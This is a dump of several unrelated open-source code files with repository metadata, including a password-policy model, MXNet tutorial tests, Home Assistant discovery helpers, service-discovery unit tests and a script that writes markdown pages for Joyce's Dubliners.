"precovery": [0, 1, 2]} # categorical, thus same as range
default = {"plen": 8, "psets": 2, "pdict": 0,
"phist": 1, "prenew": 1, "pattempts": 0,
"precovery": 1}
neutral = {"plen": 8, "psets": 2, "pdict": 1,
"phist": 2, "prenew": 1, "pattempts": 1,
"precovery": 1}
@staticmethod
def policy2datapoint(policy):
"""
Gets a pw_policy dictionary
:policy: The policy to read password policy parameters from
Returns a tuple of password policy items. All other parameters are ignored.
"""
return [policy["plen"], policy["psets"],
policy["pdict"], policy["phist"],
policy["prenew"], policy["pattempts"],
policy["precovery"]]
@classmethod
def update(cls, where, values):
"""
Generates query string using db_helper.update_helper.stringify, and runs db.query.
"""
return db.query(db_helper.update_helper.stringify('pw_policy', where, values), vars=locals())
    # This method conceptually belongs to policies, not to pw_policy.
    # However, it appears to be unused.
@classmethod
    def latest_policy(cls, user_id):
policy = {
'location': "",
'employee': "",
'device': "",
'bdata': "", # why are these strings and not numbers?
'pdata': ""}
        policy.update(cls.default)
db_policy_all = db.select('policies', where="user_id=$user_id", order="date DESC", vars=locals())
if len(db_policy_all) > 0:
db_policy = db_policy_all[0]
db_bio = db.select('biometrics', where="id=$db_policy.bio_id", vars=locals())[0]
db_pass = db.select('passfaces', where="id=$db_policy.pass_id", vars=locals())[0]
db_pw = db.select('pw_policy_test', where="id=$db_policy.pw_id", vars=locals())[0]
policy["location"] = db_policy.location
policy["employee"] = db_policy.employee
policy["device"] = db_policy.device
policy["bdata"] = db_bio.bdata
policy["pdata"] = db_pass.pdata
policy["plen"] = db_pw.plen
policy["psets"] = db_pw.psets
policy["pdict"] = db_pw.pdict
policy["phist"] = db_pw.phist
policy["prenew"] = db_pw.prenew
policy["pattempts"] = db_pw.pattempts
policy["precovery"] = db_pw.precovery
return policy
def create_variation(self, policy, id, value):
new_policy = {}
for key in policy:
new_policy[key] = policy[key]
new_policy[id] = value
return new_policy
def get_range(self, policy, id):
"""
Get range of password policies for score graphs.
"""
msgs = []
sets = self.ranges
for value in sets[id]:
new_policy = self.create_variation(policy, id, value)
msg = {}
msg['id'] = id+str(value)
msg["data"] = new_policy
msgs.append(msg)
return msgs
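# Hedged usage sketch (editor's addition): policy2datapoint flattens a policy
# dict into a fixed-order list of the password parameters, and get_range
# enumerates variations of a single parameter for the score graphs. Neither
# method touches the database.
if __name__ == '__main__':
    model = pw_policy_model()
    print(pw_policy_model.policy2datapoint(pw_policy_model.default))
    # [8, 2, 0, 1, 1, 0, 1]
    for variation in model.get_range(pw_policy_model.default, 'plen'):
        print("%s: plen=%d" % (variation['id'], variation['data']['plen']))
    # one line per value in ranges['plen']: plen0, plen6, plen8, plen10, plen12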
|
{
"content_hash": "ec6049e188dffc3e8f2b4d8832a3a3f4",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 105,
"avg_line_length": 37.095238095238095,
"alnum_prop": 0.5214377406931964,
"repo_name": "mapto/sprks",
"id": "b845acf257f39ed8b43e1c1b01e587ff4c8d3df4",
"size": "3895",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "models/pw_policy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "15370"
},
{
"name": "Dockerfile",
"bytes": "327"
},
{
"name": "HTML",
"bytes": "35629"
},
{
"name": "JavaScript",
"bytes": "75183"
},
{
"name": "Python",
"bytes": "124271"
},
{
"name": "Shell",
"bytes": "72"
}
],
"symlink_target": ""
}
|
"""
This file tests and ensures that all tutorial notebooks run
without warning or exception.
env variable MXNET_TUTORIAL_TEST_KERNEL controls which kernel to use
when running the notebook. e.g:
`export MXNET_TUTORIAL_TEST_KERNEL=python2`
env variable MXNET_TUTORIAL_TEST_NO_CACHE controls whether to clean the
temporary directory in which the notebook was run and re-download any
resource file. The default behaviour is to not clean the directory. Set to '1'
to force clean the directory. e.g:
`export MXNET_TUTORIAL_TEST_NO_CACHE=1`
NB: in the real CI, the tests will re-download everything since they start from
a clean workspace.
"""
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', 'utils'))
from notebook_test import run_notebook
# This is outdated and needs to be completely redone.
TUTORIAL_DIR = os.path.join(os.path.dirname(__file__), '..', '..', 'docs', '_build', 'html', 'tutorials')
KERNEL = os.getenv('MXNET_TUTORIAL_TEST_KERNEL', None)
NO_CACHE = os.getenv('MXNET_TUTORIAL_TEST_NO_CACHE', False)
def _test_tutorial_nb(tutorial):
"""Run tutorial Jupyter notebook to catch any execution error.
Parameters
----------
tutorial : str
the name of the tutorial to be tested
Returns
-------
True if there are no warnings or errors.
"""
return run_notebook(tutorial, TUTORIAL_DIR, kernel=KERNEL, no_cache=NO_CACHE)
def test_basic_ndarray():
assert _test_tutorial_nb('basic/ndarray')
def test_basic_ndarray_indexing():
assert _test_tutorial_nb('basic/ndarray_indexing')
def test_basic_symbol():
assert _test_tutorial_nb('basic/symbol')
def test_basic_module():
assert _test_tutorial_nb('basic/module')
def test_basic_data():
assert _test_tutorial_nb('basic/data')
def test_basic_reshape_transpose():
assert _test_tutorial_nb('basic/reshape_transpose')
def test_gluon_customop():
assert _test_tutorial_nb('gluon/customop')
def test_gluon_custom_layer():
assert _test_tutorial_nb('gluon/custom_layer')
def test_gluon_transforms():
assert _test_tutorial_nb('gluon/transforms')
def test_gluon_data_augmentation():
assert _test_tutorial_nb('gluon/data_augmentation')
def test_gluon_datasets():
assert _test_tutorial_nb('gluon/datasets')
def test_gluon_naming():
assert _test_tutorial_nb('gluon/naming')
def test_gluon_ndarray():
assert _test_tutorial_nb('gluon/ndarray')
def test_gluon_mnist():
assert _test_tutorial_nb('gluon/mnist')
def test_gluon_autograd():
assert _test_tutorial_nb('gluon/autograd')
def test_gluon_gluon():
assert _test_tutorial_nb('gluon/gluon')
def test_gluon_multi_gpu():
assert _test_tutorial_nb('gluon/multi_gpu')
def test_gluon_save_load_params():
assert _test_tutorial_nb('gluon/save_load_params')
def test_gluon_hybrid():
assert _test_tutorial_nb('gluon/hybrid')
# https://github.com/apache/incubator-mxnet/issues/16181
"""
def test_gluon_performance():
assert _test_tutorial_nb('gluon/performance')
"""
def test_gluon_pretrained_models():
assert _test_tutorial_nb('gluon/pretrained_models')
def test_gluon_learning_rate_finder():
assert _test_tutorial_nb('gluon/learning_rate_finder')
def test_gluon_learning_rate_schedules():
assert _test_tutorial_nb('gluon/learning_rate_schedules')
def test_gluon_learning_rate_schedules_advanced():
assert _test_tutorial_nb('gluon/learning_rate_schedules_advanced')
def test_gluon_info_gan():
assert _test_tutorial_nb('gluon/info_gan')
def test_gluon_fit_api_fashion_mnist():
assert _test_tutorial_nb('gluon/fit_api_tutorial')
def test_nlp_cnn():
assert _test_tutorial_nb('nlp/cnn')
def test_onnx_super_resolution():
assert _test_tutorial_nb('onnx/super_resolution')
def test_onnx_export_mxnet_to_onnx():
assert _test_tutorial_nb('onnx/export_mxnet_to_onnx')
def test_onnx_fine_tuning_gluon():
assert _test_tutorial_nb('onnx/fine_tuning_gluon')
def test_onnx_inference_on_onnx_model():
assert _test_tutorial_nb('onnx/inference_on_onnx_model')
def test_python_linear_regression():
assert _test_tutorial_nb('python/linear-regression')
def test_python_logistic_regression():
assert _test_tutorial_nb('gluon/logistic_regression_explained')
def test_python_numpy_gotchas():
assert _test_tutorial_nb('gluon/gotchas_numpy_in_mxnet')
def test_gluon_end_to_end():
assert _test_tutorial_nb('gluon/gluon_from_experiment_to_deployment')
def test_python_mnist():
assert _test_tutorial_nb('python/mnist')
def test_python_predict_image():
assert _test_tutorial_nb('python/predict_image')
def test_python_data_augmentation():
assert _test_tutorial_nb('python/data_augmentation')
def test_python_data_augmentation_with_masks():
assert _test_tutorial_nb('python/data_augmentation_with_masks')
def test_python_kvstore():
assert _test_tutorial_nb('python/kvstore')
def test_module_to_gluon():
assert _test_tutorial_nb('python/module_to_gluon')
def test_python_types_of_data_augmentation():
assert _test_tutorial_nb('python/types_of_data_augmentation')
#https://github.com/apache/incubator-mxnet/issues/16181
"""
def test_python_profiler():
assert _test_tutorial_nb('python/profiler')
"""
def test_sparse_row_sparse():
assert _test_tutorial_nb('sparse/row_sparse')
def test_sparse_csr():
assert _test_tutorial_nb('sparse/csr')
def test_sparse_train():
assert _test_tutorial_nb('sparse/train')
def test_sparse_train_gluon():
assert _test_tutorial_nb('sparse/train_gluon')
def test_speech_recognition_ctc():
assert _test_tutorial_nb('speech_recognition/ctc')
def test_unsupervised_learning_gan():
assert _test_tutorial_nb('unsupervised_learning/gan')
def test_vision_large_scale_classification():
assert _test_tutorial_nb('vision/large_scale_classification')
def test_vision_cnn_visualization():
assert _test_tutorial_nb('vision/cnn_visualization')
def test_control_flow():
assert _test_tutorial_nb('control_flow/ControlFlowTutorial')
def test_amp():
assert _test_tutorial_nb('amp/amp_tutorial')
# https://github.com/apache/incubator-mxnet/issues/16181
"""
def test_mkldnn_quantization():
assert _test_tutorial_nb('mkldnn/mkldnn_quantization')
"""
|
{
"content_hash": "5aa67368c517acee321b7d41c2c53e49",
"timestamp": "",
"source": "github",
"line_count": 207,
"max_line_length": 105,
"avg_line_length": 30.468599033816425,
"alnum_prop": 0.7146028222609798,
"repo_name": "larroy/mxnet",
"id": "2ebd2f8e92cac92712f5d228b511f5a4661982c4",
"size": "7261",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "tests/tutorials/test_tutorials.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "1731"
},
{
"name": "Batchfile",
"bytes": "13130"
},
{
"name": "C",
"bytes": "227904"
},
{
"name": "C++",
"bytes": "9484781"
},
{
"name": "CMake",
"bytes": "157181"
},
{
"name": "Clojure",
"bytes": "622652"
},
{
"name": "Cuda",
"bytes": "1290387"
},
{
"name": "Dockerfile",
"bytes": "100732"
},
{
"name": "Groovy",
"bytes": "165549"
},
{
"name": "HTML",
"bytes": "40277"
},
{
"name": "Java",
"bytes": "205196"
},
{
"name": "Julia",
"bytes": "445413"
},
{
"name": "Jupyter Notebook",
"bytes": "3660357"
},
{
"name": "MATLAB",
"bytes": "34903"
},
{
"name": "Makefile",
"bytes": "148945"
},
{
"name": "Perl",
"bytes": "1558292"
},
{
"name": "PowerShell",
"bytes": "11743"
},
{
"name": "Python",
"bytes": "9656682"
},
{
"name": "R",
"bytes": "357994"
},
{
"name": "Raku",
"bytes": "9012"
},
{
"name": "SWIG",
"bytes": "161870"
},
{
"name": "Scala",
"bytes": "1304647"
},
{
"name": "Shell",
"bytes": "460507"
},
{
"name": "Smalltalk",
"bytes": "3497"
}
],
"symlink_target": ""
}
|
import os
import time
import google.auth
from google.api import monitored_resource_pb2
from google.cloud import logging_v2
from google.cloud.logging_v2.proto import log_entry_pb2
from google.cloud.logging_v2.proto import logging_pb2
class TestSystemLoggingServiceV2(object):
def test_write_log_entries(self):
_, project_id = google.auth.default()
client = logging_v2.LoggingServiceV2Client()
log_name = client.log_path(project_id, "test-{0}".format(time.time()))
resource = {}
labels = {}
entries = []
response = client.write_log_entries(
entries, log_name=log_name, resource=resource, labels=labels
)
|
{
"content_hash": "21b813dc37c96402db4818071d5f2aba",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 78,
"avg_line_length": 31.181818181818183,
"alnum_prop": 0.6807580174927114,
"repo_name": "dhermes/gcloud-python",
"id": "d574de7785f71233c9490fc1777da2afd60d5e54",
"size": "1262",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "logging/tests/system/gapic/v2/test_system_logging_service_v2_v2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "95635"
},
{
"name": "Python",
"bytes": "2871895"
},
{
"name": "Shell",
"bytes": "4683"
}
],
"symlink_target": ""
}
|
from datetime import timedelta
from glob import glob
import numpy as np
from .GribModelGrid import GribModelGrid
class HREFv2ModelGrid(GribModelGrid):
"""
Extension of the ModelGrid class for interfacing with the HREFv2 ensemble.
Args:
member (str): Name of the ensemble member
run_date (datetime.datetime object): Date of the initial step of the ensemble run
        variable (int or str): name of the grib2 variable (str) or grib2 message number (int) being loaded
start_date (datetime.datetime object): First time step extracted.
end_date (datetime.datetime object): Last time step extracted.
path (str): Path to model output files
"""
def __init__(self, member, run_date, variable, start_date,
end_date, path):
self.path = path
self.member = member
filenames = []
self.forecast_hours = np.arange((start_date - run_date).total_seconds() / 3600,
(end_date - run_date).total_seconds() / 3600 + 1, dtype=int)
day_before_date = (run_date - timedelta(days=1)).strftime("%Y%m%d")
member_name = str(self.member.split("_")[0])
if '00' in self.member:
initial_hour = '00'
hours = self.forecast_hours
date = run_date.strftime("%Y%m%d")
elif '12' in self.member:
initial_hour = '12'
hours = self.forecast_hours + 12
date = day_before_date
else:
initial_hour = '00'
hours = self.forecast_hours
date = run_date.strftime("%Y%m%d")
for forecast_hr in hours:
if 'nam' in self.member:
files = glob('{0}/{1}/nam*conusnest*{2}f*{3}*'.format(self.path,
date, initial_hour, forecast_hr))
if not files:
files = glob('{0}/{1}/nam*t{2}z*conusnest*{3}*'.format(self.path,
date, initial_hour, forecast_hr))
else:
files = glob('{0}/{1}/*hiresw*conus{2}*{3}f*{4}*'.format(self.path,
date, member_name, initial_hour, forecast_hr))
if len(files) >= 1:
filenames.append(files[0])
super(HREFv2ModelGrid, self).__init__(filenames, run_date, start_date, end_date, variable, member)
return
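# Hedged usage sketch (editor's addition): typical construction, assuming GRIB2
# output laid out as {path}/{YYYYMMDD}/... the way the glob patterns above
# expect. The member string encodes the model and initialization hour; the
# variable name and path below are illustrative only.
#
#     from datetime import datetime
#     run_date = datetime(2019, 5, 20, 0)
#     grid = HREFv2ModelGrid(member="nam_00", run_date=run_date,
#                            variable="REFC", start_date=run_date,
#                            end_date=run_date + timedelta(hours=24),
#                            path="/data/hrefv2")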
|
{
"content_hash": "075566e869a28d6c1c0f4945b2108e1e",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 119,
"avg_line_length": 44.94642857142857,
"alnum_prop": 0.5288041319030592,
"repo_name": "djgagne/hagelslag",
"id": "de6d5ace5ca2341f73213764266159413a02a637",
"size": "2539",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hagelslag/data/HREFv2ModelGrid.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "6617598"
},
{
"name": "Python",
"bytes": "933497"
},
{
"name": "Shell",
"bytes": "5545"
}
],
"symlink_target": ""
}
|
"""Helper methods to help with platform discovery.
There are two different types of discoveries that can be fired/listened for.
- listen/discover is for services. These are targeted at a component.
- listen_platform/discover_platform is for platforms. These are used by
components to allow discovery of their platforms.
"""
import asyncio
from homeassistant import bootstrap, core
from homeassistant.const import (
ATTR_DISCOVERED, ATTR_SERVICE, EVENT_PLATFORM_DISCOVERED)
from homeassistant.util.async import run_callback_threadsafe
EVENT_LOAD_PLATFORM = 'load_platform.{}'
ATTR_PLATFORM = 'platform'
def listen(hass, service, callback):
"""Setup listener for discovery of specific service.
Service can be a string or a list/tuple.
"""
run_callback_threadsafe(
hass.loop, async_listen, hass, service, callback).result()
@core.callback
def async_listen(hass, service, callback):
"""Setup listener for discovery of specific service.
Service can be a string or a list/tuple.
"""
if isinstance(service, str):
service = (service,)
else:
service = tuple(service)
@core.callback
def discovery_event_listener(event):
"""Listen for discovery events."""
if ATTR_SERVICE in event.data and event.data[ATTR_SERVICE] in service:
hass.async_add_job(callback, event.data[ATTR_SERVICE],
event.data.get(ATTR_DISCOVERED))
hass.bus.async_listen(EVENT_PLATFORM_DISCOVERED, discovery_event_listener)
def discover(hass, service, discovered=None, component=None, hass_config=None):
"""Fire discovery event. Can ensure a component is loaded."""
hass.add_job(
async_discover(hass, service, discovered, component, hass_config))
@asyncio.coroutine
def async_discover(hass, service, discovered=None, component=None,
hass_config=None):
"""Fire discovery event. Can ensure a component is loaded."""
if component is not None and component not in hass.config.components:
did_lock = False
setup_lock = hass.data.get('setup_lock')
if setup_lock and setup_lock.locked():
did_lock = True
yield from setup_lock.acquire()
try:
# Could have been loaded while waiting for lock.
if component not in hass.config.components:
yield from bootstrap.async_setup_component(hass, component,
hass_config)
finally:
if did_lock:
setup_lock.release()
data = {
ATTR_SERVICE: service
}
if discovered is not None:
data[ATTR_DISCOVERED] = discovered
hass.bus.async_fire(EVENT_PLATFORM_DISCOVERED, data)
def listen_platform(hass, component, callback):
"""Register a platform loader listener."""
run_callback_threadsafe(
hass.loop, async_listen_platform, hass, component, callback
).result()
def async_listen_platform(hass, component, callback):
"""Register a platform loader listener.
This method must be run in the event loop.
"""
service = EVENT_LOAD_PLATFORM.format(component)
@core.callback
def discovery_platform_listener(event):
"""Listen for platform discovery events."""
if event.data.get(ATTR_SERVICE) != service:
return
platform = event.data.get(ATTR_PLATFORM)
if not platform:
return
hass.async_run_job(
callback, platform, event.data.get(ATTR_DISCOVERED)
)
hass.bus.async_listen(
EVENT_PLATFORM_DISCOVERED, discovery_platform_listener)
def load_platform(hass, component, platform, discovered=None,
hass_config=None):
"""Load a component and platform dynamically.
Target components will be loaded and an EVENT_PLATFORM_DISCOVERED will be
fired to load the platform. The event will contain:
{ ATTR_SERVICE = LOAD_PLATFORM + '.' + <<component>>
ATTR_PLATFORM = <<platform>>
ATTR_DISCOVERED = <<discovery info>> }
Use `listen_platform` to register a callback for these events.
"""
hass.add_job(
async_load_platform(hass, component, platform, discovered,
hass_config))
@asyncio.coroutine
def async_load_platform(hass, component, platform, discovered=None,
hass_config=None):
"""Load a component and platform dynamically.
Target components will be loaded and an EVENT_PLATFORM_DISCOVERED will be
fired to load the platform. The event will contain:
{ ATTR_SERVICE = LOAD_PLATFORM + '.' + <<component>>
ATTR_PLATFORM = <<platform>>
ATTR_DISCOVERED = <<discovery info>> }
Use `listen_platform` to register a callback for these events.
    Warning: Do not yield from this inside a setup method to avoid a deadlock.
Use `hass.loop.async_add_job(async_load_platform(..))` instead.
This method is a coroutine.
"""
did_lock = False
setup_lock = hass.data.get('setup_lock')
if setup_lock and setup_lock.locked():
did_lock = True
yield from setup_lock.acquire()
setup_success = True
try:
# Could have been loaded while waiting for lock.
if component not in hass.config.components:
setup_success = yield from bootstrap.async_setup_component(
hass, component, hass_config)
finally:
if did_lock:
setup_lock.release()
# No need to fire event if we could not setup component
if not setup_success:
return
data = {
ATTR_SERVICE: EVENT_LOAD_PLATFORM.format(component),
ATTR_PLATFORM: platform,
}
if discovered is not None:
data[ATTR_DISCOVERED] = discovered
hass.bus.async_fire(EVENT_PLATFORM_DISCOVERED, data)
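# Hedged usage sketch (editor's addition): how a hub component and its sensor
# platform would typically pair these helpers. The component and device names
# below are illustrative only.
#
#     # my_hub/__init__.py -- announce devices once the hub knows about them
#     def setup(hass, config):
#         devices = {'temp_probe': '192.168.1.20'}
#         load_platform(hass, 'sensor', 'my_hub', devices, config)
#         return True
#
#     # sensor platform for my_hub -- receives the payload as discovery_info
#     def setup_platform(hass, config, add_entities, discovery_info=None):
#         if discovery_info is None:
#             return
#         add_entities([...])  # build entities from discovery_info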
|
{
"content_hash": "0c1d0e99ec6fe32623e72d5748e56f1c",
"timestamp": "",
"source": "github",
"line_count": 182,
"max_line_length": 79,
"avg_line_length": 32.30769230769231,
"alnum_prop": 0.6489795918367347,
"repo_name": "robjohnson189/home-assistant",
"id": "de16a0b907dcdbb118fb1dcb95312ce116c3c0a2",
"size": "5880",
"binary": false,
"copies": "10",
"ref": "refs/heads/dev",
"path": "homeassistant/helpers/discovery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1362685"
},
{
"name": "Python",
"bytes": "3499625"
},
{
"name": "Ruby",
"bytes": "379"
},
{
"name": "Shell",
"bytes": "7255"
}
],
"symlink_target": ""
}
|
import StringIO
import mock
import unittest
from tavrida import discovery
from tavrida import exceptions
class LocalDiscoveryTestCase(unittest.TestCase):
def test_register_remote_service(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_service(service_name, exchange_name)
self.assertDictEqual(disc._remote_registry,
{"some_service": "some_exchange"})
def test_register_remote_publisher(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_publisher(service_name, exchange_name)
self.assertDictEqual(disc._remote_publisher_registry,
{"some_service": "some_exchange"})
def test_register_local_publisher(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_local_publisher(service_name, exchange_name)
self.assertDictEqual(disc._local_publisher_registry,
{"some_service": "some_exchange"})
def test_unregister_remote_service(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_service(service_name, exchange_name)
disc.unregister_remote_service(service_name)
self.assertDictEqual(disc._remote_registry, {})
def test_unregister_remote_publisher(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_publisher(service_name, exchange_name)
disc.unregister_remote_publisher(service_name)
self.assertDictEqual(disc._remote_publisher_registry, {})
def test_unregister_local_publisher(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_local_publisher(service_name, exchange_name)
disc.unregister_local_publisher(service_name)
self.assertDictEqual(disc._local_publisher_registry, {})
def test_get_remote_positive(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_service(service_name, exchange_name)
res = disc.get_remote(service_name)
self.assertEqual(res, exchange_name)
def test_get_remote_negative(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
self.assertRaises(exceptions.UnableToDiscover,
disc.get_remote, service_name)
def test_get_remote_publisher_positive(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_publisher(service_name, exchange_name)
res = disc.get_remote_publisher(service_name)
self.assertEqual(res, exchange_name)
def test_get_remote_publisher_negative(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
self.assertRaises(exceptions.UnableToDiscover,
disc.get_remote_publisher, service_name)
def test_get_local_publisher_positive(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_local_publisher(service_name, exchange_name)
res = disc.get_local_publisher(service_name)
self.assertEqual(res, exchange_name)
def test_get_local_publisher_negative(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
self.assertRaises(exceptions.UnableToDiscover,
disc.get_local_publisher, service_name)
def test_get_all_exchanges(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_service(service_name, exchange_name)
disc.register_remote_publisher(service_name, exchange_name)
disc.register_local_publisher(service_name, exchange_name)
res = disc.get_all_exchanges()
self.assertListEqual(res["remote"], [exchange_name])
self.assertListEqual(res["remote_publisher"], [exchange_name])
self.assertListEqual(res["local_publisher"], [exchange_name])
VALID_DS_FILE = """
[service1]
exchange=service1_exchange
notifications=service1_notifications
[service2]
exchange=service2_exchange
notifications=service2_notifications
[service3]
exchange=service3_exchange
notifications=service3_notifications
[service4]
exchange=service4_exchange
"""
class FileBasedDiscoveryServiceTestCase(unittest.TestCase):
@mock.patch('__builtin__.open')
def setUp(self, open_mock):
dsfile_ini = StringIO.StringIO(VALID_DS_FILE)
open_mock.return_value = dsfile_ini
self.ds = discovery.FileBasedDiscoveryService(
'ds.ini',
'service1',
subscriptions=['service2', 'service3'])
def test_get_remote_service1(self):
self.assertRaises(exceptions.UnableToDiscover,
self.ds.get_remote,
'service1')
def test_get_remote_service2(self):
self.assertEqual(self.ds.get_remote('service2'),
'service2_exchange')
def test_get_remote_service3(self):
self.assertEqual(self.ds.get_remote('service3'),
'service3_exchange')
def test_get_remote_service4(self):
self.assertEqual(self.ds.get_remote('service4'),
'service4_exchange')
def test_get_local_publisher(self):
self.assertEqual(self.ds.get_local_publisher('service1'),
'service1_notifications')
def test_service_without_local_publisher(self):
with mock.patch('__builtin__.open') as open_mock:
dsfile_ini = StringIO.StringIO(VALID_DS_FILE)
open_mock.return_value = dsfile_ini
ds = discovery.FileBasedDiscoveryService(
'ds.ini',
'service4')
self.assertRaises(exceptions.UnableToDiscover,
ds.get_local_publisher,
'service4')
def test_get_remote_publisher_service2(self):
self.assertEqual(self.ds.get_remote_publisher('service2'),
'service2_notifications')
def test_get_remote_publisher_service3(self):
self.assertEqual(self.ds.get_remote_publisher('service3'),
'service3_notifications')
def test_get_remote_publisher_service4(self):
self.assertRaises(exceptions.UnableToDiscover,
self.ds.get_remote_publisher,
'service4')
def test_get_all_exchanges(self):
a = self.ds.get_all_exchanges()
self.assertEqual(set(a['local_publisher']),
{'service1_notifications'})
self.assertEqual(set(a['remote_publisher']),
{'service2_notifications',
'service3_notifications'})
self.assertEqual(set(a['remote']),
{'service2_exchange',
'service3_exchange',
'service4_exchange'})
class FileBasedDiscoveryServiceNegativeTestCase(unittest.TestCase):
@mock.patch('__builtin__.open')
def test_bad_subscription_name(self, open_mock):
dsfile_ini = StringIO.StringIO(VALID_DS_FILE)
open_mock.return_value = dsfile_ini
self.assertRaises(exceptions.ServiceIsNotRegister,
discovery.FileBasedDiscoveryService,
'ds.ini',
'service1',
['service2', 'serviceX'])
@mock.patch('__builtin__.open')
def test_bad_service_name(self, open_mock):
dsfile_ini = StringIO.StringIO(VALID_DS_FILE)
open_mock.return_value = dsfile_ini
self.assertRaises(exceptions.ServiceIsNotRegister,
discovery.FileBasedDiscoveryService,
'ds.ini',
'serviceX')
@mock.patch('__builtin__.open')
def test_bad_subscription(self, open_mock):
"""Subscribe to service without notifications exchange."""
dsfile_ini = StringIO.StringIO(VALID_DS_FILE)
open_mock.return_value = dsfile_ini
self.assertRaises(exceptions.CantRegisterRemotePublisher,
discovery.FileBasedDiscoveryService,
'ds.ini',
'service1',
subscriptions=['service4'])
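# Hedged usage sketch (editor's addition): outside the tests, the discovery
# services resolve service names to AMQP exchanges. With an ini file shaped
# like VALID_DS_FILE above:
#
#     ds = discovery.FileBasedDiscoveryService('ds.ini', 'service1',
#                                              subscriptions=['service2'])
#     ds.get_remote('service2')            # -> 'service2_exchange'
#     ds.get_remote_publisher('service2')  # -> 'service2_notifications'
#     ds.get_local_publisher('service1')   # -> 'service1_notifications'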
|
{
"content_hash": "14e7e6db95cc5b7827a0a0c5ee11b929",
"timestamp": "",
"source": "github",
"line_count": 242,
"max_line_length": 70,
"avg_line_length": 37.12396694214876,
"alnum_prop": 0.6194345503116652,
"repo_name": "sbunatyan/tavrida",
"id": "1934a9a0b71525224cfe6cce05f2f8977cfa9d56",
"size": "8984",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_discovery.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "228935"
}
],
"symlink_target": ""
}
|
import os
import sys
from rdr_service.dao.hpo_dao import HPODao
from rdr_service.model.hpo import HPO
from tests.helpers.unittest_base import BaseTestCase
class TestEnvironment(BaseTestCase):
"""
Test our python environment
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.uses_database = False
def test_python_version(self):
""" Make sure we are using Python 3.7 or higher """
self.assertEqual(sys.version_info[0], 3)
self.assertGreaterEqual(sys.version_info[1], 7)
def test_project_structure(self):
""" Test that the project structure looks correct """
cwd = os.path.curdir
self.assertTrue(os.path.exists(os.path.join(cwd, 'rdr_service')))
self.assertTrue(os.path.exists(os.path.join(cwd, 'rdr_service/tools')))
self.assertTrue(os.path.exists(os.path.join(cwd, 'rdr_service/main.py')))
def test_flask_app(self):
"""
Test that we can import the flask app object and get the version id.
https://realpython.com/python-testing/#how-to-use-unittest-and-flask
"""
from rdr_service.main import app
self.assertTrue(isinstance(app, object))
# Put flask in testing mode
app.testing = True
client = app.test_client()
resp = client.get('/')
self.assertEqual(resp.json['version_id'], 'develop')
def test_basic_db_query(self):
"""
Test that we are connected to the database and can complete a query.
"""
with HPODao().session() as session:
count = session.query(HPO).count()
self.assertGreater(count, 0)
|
{
"content_hash": "5cf48177ab1aa066ed04878cc117e0ee",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 81,
"avg_line_length": 34.42857142857143,
"alnum_prop": 0.6271487848251334,
"repo_name": "all-of-us/raw-data-repository",
"id": "511f7a80f285d80120b4f1d4a0b685c6dd6acc0e",
"size": "1687",
"binary": false,
"copies": "1",
"ref": "refs/heads/devel",
"path": "tests/test_environment.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1866"
},
{
"name": "Mako",
"bytes": "1715"
},
{
"name": "Python",
"bytes": "17040924"
},
{
"name": "R",
"bytes": "2212"
},
{
"name": "Shell",
"bytes": "92213"
}
],
"symlink_target": ""
}
|
dubliners_stories = ['The Sisters',
'An Encounter',
'Araby',
'Eveline',
'After the Race',
'Two Gallants',
'The Boarding House',
'A Little Cloud',
'Counterparts',
'Clay',
'A Painful Case',
'Ivy Day in the Committee Room',
'A Mother',
'Grace',
'The Dead']
links = {}
for im1,story in enumerate(dubliners_stories):
i = im1+1
filename_base = "dubliners%d"%(i)
html_filename = filename_base+".html"
md_filename = filename_base+".md"
contents = "Title: "+story
contents += "\nAuthors: James Joyce"
contents += "\nHeaderStyle: languagekey"
contents += "\nsave_as: "+html_filename
contents += "\n\n"
contents += "{%include_html "+html_filename+"%}"
contents += "\n\n"
links[story] = html_filename
with open(md_filename,'w') as f:
f.write(contents)
print "Finished writing markdown file ",md_filename
# now make the main page
filename_base = "dubliners"
html_filename = filename_base+".html"
md_filename = filename_base+".md"
contents = "Title: Dubliners"
contents += "\nAuthors: James Joyce"
contents += "\nHeaderStyle: book"
